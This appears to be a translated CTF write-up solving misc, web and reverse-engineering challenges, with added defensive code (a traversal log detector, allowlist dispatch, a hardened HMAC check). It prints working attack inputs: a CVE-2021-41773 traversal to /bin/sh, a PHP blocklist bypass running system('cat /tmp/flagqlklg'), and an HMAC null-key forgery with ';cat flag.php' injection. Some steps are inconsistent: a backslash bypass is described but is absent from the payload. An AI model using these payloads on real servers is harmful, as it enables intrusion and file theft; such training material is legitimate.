强国杯 (Qiangguo Cup) Regional Round, Northern Region: WriteUp
Misc
好多图图 (Lots of Pictures)
Unzip the docx; the flag is in the wordtheme folder:
flag{aex4mv2nwr1gq857ztb3pflukycod0jh}
编码的乐趣 (The Fun of Encoding)
1: The challenge document gives a "Buddha says" (佛曰) ciphertext, but the leading "佛曰:" marker is missing:
哆密罰輸闍朋冥竟罰。參他俱喝多哆夷爍侄礙俱夢奢顛孕怯蒙三缽迦缽彌呐殿諳集奢夜喝怯神皤切缽涅闍不呐波侄夷梵漫那盧呐多諳利罰切奢藝奢薩槃吉明缽波奢伊豆皤怛缽室神缽至諳大耶勝冥集哆有即朋無諦冥婆跋娑怯彌呐咒彌哆提哆離侄夜槃恐侄礙以道冥跋冥竟遮漫朋俱呼怯那咒室夜諳神冥都諳伊死娑皤能等倒薩麼羯怯逝諳恐呐蒙婆罰苦皤遮瑟奢世諳栗礙俱那上諸陀冥藝波奢依竟冥盡侄尼伽夷數瑟藐梵夜俱諸奢若諦皤咒醯醯世呐怖罰阿無梵呼罰悉缽實盧涅除竟侄曳帝呐智穆亦冥穆不皤恐數冥孕冥依實俱諦諦智呐夢夷瑟薩利侄恐楞呐竟佛俱無藝跋提想楞耨奢勝夜侄悉遠豆諳滅沙缽亦除勝離醯罰諸呐伊菩梵知冥藝怯亦能缽三世故罰上謹曳缽醯侄諸闍諳地切提瑟吉盧怯以咒俱離呐集諸切侄實缽帝奢亦罰迦勝冥數哆利奢所竟俱依羯瑟特呼僧怖缽帝數罰者喝缽知悉故切爍穆娑缽漫罰夜皤闍梵蘇俱上勝豆缽羯缽沙怯數俱隸罰遠皤能諳楞知哆三陀多盧哆數婆梵漫伽夜謹缽楞恐呐切皤怛諳菩缽藝隸缽恐所都爍怯伽麼
2: Restore the missing marker and decode the Buddha-says text; this yields a "core socialist values" encoded string, which decodes to an MD5 hash:
f52d7bd4870ac30e5a7cff83a73af707
4: Crack the MD5 to get the flag:
flag{jGfR0us1AMZho3uZPl}
Web
Execute command
CVE-2021-41773, the Apache path traversal vulnerability:
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
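The payload above only works because the request path reaches the server with its dots percent-encoded, so anything that inspects raw access logs has to decode before it looks for `..`. The following detector is an added example and not part of the original write-up: it parses constructed Combined-Log-Format lines (the addresses, timestamps and user agents are invented), decodes each path until the text stops changing so that single or nested encodings cannot hide a dot, and flags any request whose decoded path climbs upward. A traversal under /cgi-bin/ that was answered with 200 is marked separately, because that combination means the server accepted the path rather than rejecting it.

```python
import re
from urllib.parse import unquote

# Constructed Combined-Log-Format lines (documentation IP ranges); not from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.5 - - [10/Oct/2021:12:00:02 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 0 "-" "curl/7.68.0"
198.51.100.7 - - [10/Oct/2021:12:00:03 +0000] "GET /icons/.%2e/%2e%2e/etc/passwd HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
198.51.100.7 - - [10/Oct/2021:12:00:04 +0000] "GET /images/logo%2epng HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(path: str) -> str:
    """Percent-decode until the text stops changing (bounded), so a '.' hidden
    behind one or more layers of encoding is visible to the check."""
    cur = path
    for _ in range(5):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def is_traversal(raw_path: str) -> bool:
    """True when any path segment is '..' after decoding. The log stores the
    raw request line, so decoding here is mandatory."""
    decoded = fully_decode(raw_path.split("?", 1)[0])
    return any(seg == ".." for seg in decoded.split("/"))


def scan_log(text: str) -> list:
    """Return one record per request whose path traverses upward."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal(m["path"]):
            hits.append({
                "ip": m["ip"],
                "path": m["path"],
                "status": int(m["status"]),
                # a traversal under /cgi-bin/ answered with 200 is the case to escalate:
                # the server accepted the path instead of rejecting it
                "cgi_success": m["path"].startswith("/cgi-bin/") and m["status"] == "200",
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The bounded decode loop is the important design choice: a single `unquote` catches `%2e`, but a detector that stops there is blind to the same dots encoded twice, which is why the loop repeats until the string is stable.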
guomi
Capturing the request shows the parameters func and p. Trying to execute commands through system fails because it is filtered.
Fuzzing shows that the readfile function is still allowed, which gives us the source code:
    <?php
    $disable_fun = array("file_get_contents","exec","shell_exec","system","ls","passthru","proc_open","cat /tmp/flagqlklg","tac /tmp/flagqlklg","more /tmp/flagqlklg","less /tmp/flagqlklg","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a = gettype($result);
        if ($a == "string") {
            return $result;
        } else {
            return "";
        }
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];
    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func, $disable_fun)) {
            if (!in_array($p, $disable_fun)) {
                echo gettime($func, $p);
            } else {
                die("you are Hacker....");
            }
            #echo gettime($func, $p);
        } else {
            die("you are Hacker...");
        }
    }
    ?>
All of the following are filtered:
"file_get_contents","exec","shell_exec","system","ls","passthru","proc_open","cat /tmp/flagqlklg","tac /tmp/flagqlklg","more /tmp/flagqlklg","less /tmp/flagqlklg","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents"
The list contains what looks like the flag's file path. Since in_array only matches the exact string, a backslash in the command bypasses the check:
func=system&p=cat /tmp/flagqlklg
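The root cause here is the design, not the contents of the list: call_user_func reaches every defined function, and a blocklist can only enumerate the names the author thought of, which is exactly why readfile slipped through. The following is an added example, not the challenge's code, written in Python to show the two designs side by side. It uses a constructed in-memory file system and a fixed clock so it runs offline and deterministically; fake_date stands in for PHP's date() but takes strftime directives, and fake_system never executes anything.

```python
import datetime

# Constructed stand-ins: a tiny fake file system and a fixed clock, so the
# example is deterministic and touches nothing real.
FAKE_FS = {
    "/tmp/notes.txt": "constructed file content",
    "/var/www/html/index.php": "<?php /* constructed */ ?>",
}
FIXED_NOW = datetime.datetime(2021, 10, 10, 12, 0, 0)


def fake_date(fmt: str) -> str:
    """Stands in for PHP date(); takes strftime directives, not PHP format letters."""
    return FIXED_NOW.strftime(fmt)


def fake_readfile(path: str) -> str:
    return FAKE_FS.get(path, "")


def fake_system(cmd: str) -> str:
    # Never runs anything; it exists only so the table has a dangerous entry,
    # the way PHP's global function table does.
    return "<refused to run: %s>" % cmd


# Everything a name-based dispatcher can reach, like call_user_func over PHP's function table.
REACHABLE = {"date": fake_date, "readfile": fake_readfile, "system": fake_system}

# Blocklist design from the challenge: enumerate bad names, allow everything else.
DISABLE_FUN = {"system", "exec", "shell_exec", "passthru", "file_get_contents"}


def gettime_blocklist(func: str, p: str):
    """Mirrors the challenge's check: reject listed names, dispatch any other name."""
    func = func.lower()
    if func in DISABLE_FUN or p in DISABLE_FUN:
        return None  # the "you are Hacker" branch
    fn = REACHABLE.get(func)
    if fn is None:
        return ""
    result = fn(p)
    return result if isinstance(result, str) else ""


# Allowlist design: the feature only ever needs date(), so only date() is reachable.
ALLOWED = {"date": fake_date}
MAX_ARG_LEN = 64


def gettime_allowlist(func, p):
    """Dispatch only names in ALLOWED, and only with a short string argument."""
    if not isinstance(func, str) or not isinstance(p, str) or len(p) > MAX_ARG_LEN:
        return None
    fn = ALLOWED.get(func.lower())
    if fn is None:
        return None
    return fn(p)


if __name__ == "__main__":
    print(gettime_blocklist("readfile", "/tmp/notes.txt"))  # file content: readfile is not on the list
    print(gettime_allowlist("readfile", "/tmp/notes.txt"))  # None: readfile is not on the allowlist
    print(gettime_allowlist("date", "%Y-%m-%d"))
```

Note that the allowlist version also type-checks and bounds its argument before dispatching; the original code compares $p against the blocklist but otherwise passes whatever arrives in the request straight to the chosen function.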
web_Huluwa
Looking at the page source, the challenge source is found at the end of the huluwa.mp3 file:
    if(empty($_POST['Huluxiaojinggang']) || empty($_POST['Shejing'])){
        die('看我四娃喷火!看我五娃喷水!');
    }
    $secret = getenv("secret");
    if(isset($_POST['yeye']))
        $secret = hash_hmac('sha256', $_POST['yeye'], $secret);
    $qwer = hash_hmac('sha256', $_POST['Shejing'], $secret);
    if($qwer !== $_POST['Huluxiaojinggang']){
        die('看我大娃 正蹬,鞭腿,刺拳,训练有素。');
    }
    echo exec("nc".$_POST['Shejing']);
We have to pass both Huluxiaojinggang and Shejing so that neither is empty.
Then the submitted White-cat-monitor value is hashed.
After that comes the comparison; then we need the yeye value to get the command executed and find the flag.
At this point we don't know the hashing key, which is the content of the environment variable.
One thing to know: when hash_hmac is given an array as the data to hash, it returns null.
And if the key $key is null, the resulting hash is something we can compute ourselves.
So pass yeye as an array: secret becomes null, and we control what qwer is computed from.
So we set Shejing to
;cat flag.php
HMAC it with the key NULL:
04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
Finally, pass the parameters:
Huluxiaojinggang=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&Shejing=;cat flag.php
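Three defects combine in this challenge: the client can re-derive the HMAC key through yeye, a non-string field turns that key into an empty string, and the verified value is then concatenated into a shell command. The example below is added here and is not the challenge's code; it is Python that models the PHP semantics as the write-up describes them (hash_hmac over an array yields null, and a null key is used as the empty string) in check_vulnerable, and beside it check_hardened with the same feature and those defects removed. The parameter names Huluxiaojinggang, Shejing and yeye come from the challenge; the secret value, example.test host and port are constructed for the test, and build_nc_argv is an assumed replacement for exec("nc".$_POST['Shejing']) that validates the target and hands an argument list to subprocess instead of a shell string.

```python
import hashlib
import hmac
import re


def hmac_hex(key: bytes, data: bytes) -> str:
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def check_vulnerable(form: dict, env_secret: str) -> bool:
    """Model of the challenge's check, with PHP semantics as assumed from the
    write-up: a non-string 'yeye' makes hash_hmac() return null, and that null
    is then used as an empty key for the real tag."""
    secret = env_secret.encode()
    if "yeye" in form:
        yeye = form["yeye"]
        secret = hmac_hex(secret, yeye.encode()).encode() if isinstance(yeye, str) else b""
    tag = hmac_hex(secret, form["Shejing"].encode())
    return tag == form["Huluxiaojinggang"]  # plain ==, also not constant-time


def check_hardened(form: dict, env_secret: str) -> bool:
    """Same feature with the defects removed: the key comes only from the
    environment and must be set, every field must be a string before it is
    hashed, and the comparison is constant-time."""
    if not env_secret:
        raise RuntimeError("secret is not configured; refusing to verify with an empty key")
    cmd = form.get("Shejing")
    tag = form.get("Huluxiaojinggang")
    if not isinstance(cmd, str) or not isinstance(tag, str):
        return False  # arrays and other non-string inputs never reach the HMAC
    # 'yeye' is deliberately ignored: the client must not influence key derivation
    expected = hmac_hex(env_secret.encode(), cmd.encode())
    return hmac.compare_digest(expected, tag)


# Assumed target format for the nc call: host:port, nothing else.
TARGET_RE = re.compile(r"^(?P<host>[A-Za-z0-9.-]{1,253}):(?P<port>[0-9]{1,5})$")


def build_nc_argv(target: str) -> list:
    """Argument vector for nc. Replaces exec("nc".$_POST[...]) with a strict
    format check and a list of arguments, so no shell ever parses the input."""
    m = TARGET_RE.match(target)
    if not m or not 1 <= int(m["port"]) <= 65535:
        raise ValueError("target must be host:port")
    return ["nc", m["host"], m["port"]]  # pass to subprocess.run(argv); never shell=True


if __name__ == "__main__":
    secret = "constructed-secret"
    forged = {"Shejing": ";cat flag.php", "yeye": [],
              "Huluxiaojinggang": hmac_hex(b"", b";cat flag.php")}
    print("vulnerable accepts forged tag:", check_vulnerable(forged, secret))
    print("hardened accepts forged tag:  ", check_hardened(forged, secret))
```

The hardened check fails closed on a missing secret rather than silently hashing with an empty key, which is the failure mode the write-up exploits; type-checking the fields before hashing is what makes the yeye-as-array trick irrelevant.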
re
re1
The main logic function.
Stepping into it, decompilation fails.
Adjusting the IDA configuration file fixes that.
Scrolling to the end shows the main encryption logic.
It is a simple XOR; just mind the endianness when decrypting.
    # The seventh character of the ciphertext is the DEL byte (0x7f); it is
    # written as an escape here because the raw byte does not survive copy-paste.
    enc = 'i~lqy~\x7fky}{cb{m{x}kynkyw'
    key = 10
    flag = ''
    for c in enc:
        flag += chr(ord(c) ^ key)  # single-byte XOR with key 10
    print(flag)
    # ctf{stuaswqihqgqrwasdas}
Originally published on the WeChat official account 齐鲁师院网络安全社团: 强国杯分区赛北部赛区WriteUp